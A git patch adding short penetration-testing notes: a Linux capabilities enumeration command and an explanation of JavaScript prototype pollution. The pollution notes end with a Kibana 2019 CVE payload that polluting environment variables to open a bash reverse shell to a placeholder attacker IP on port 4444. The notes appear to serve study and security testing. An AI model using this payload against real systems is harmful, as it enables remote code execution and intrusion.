From 5b7c1e98f00bc4b46db251499c86c6cfa4e2473e Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Fri, 3 Sep 2021 00:58:49 +0200
Subject: [PATCH] added prototype pollution

---
 exploit/linux/capabilities.md  |  8 ++++++++
 exploit/prototype_pollution.md | 31 +++++++++++++++++++++++++++++++
 2 files changed, 39 insertions(+)
 create mode 100644 exploit/linux/capabilities.md
 create mode 100644 exploit/prototype_pollution.md

diff --git a/exploit/linux/capabilities.md b/exploit/linux/capabilities.md
new file mode 100644
index 0000000..a524736
--- /dev/null
+++ b/exploit/linux/capabilities.md
@@ -0,0 +1,8 @@
+# Capabilities
+
+* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
+
+## Usage
+```sh
+getcap -r  / 2>/dev/null
+```
diff --git a/exploit/prototype_pollution.md b/exploit/prototype_pollution.md
new file mode 100644
index 0000000..d12f7b7
--- /dev/null
+++ b/exploit/prototype_pollution.md
@@ -0,0 +1,31 @@
+# Prototype Pollution
+
+* Overwrite built in properties, like constructor, toString of an object.
+* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
+## Usage
+* Access to prototype inside object, as an example Javascript
+```javascript
+obj.__proto__
+Object.prototype
+```
+* Create object 
+```javascript
+let obj = {}
+```
+* Create properties inside `__proto__`.
+```javascript
+obj.__proto__.isAdmin = true
+```
+
+### Start Node commands
+* Use 
+    * `require`
+    * `eval`
+
+### Kibana CVE 2019
+* Write reverse bash into variable
+```javascript
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+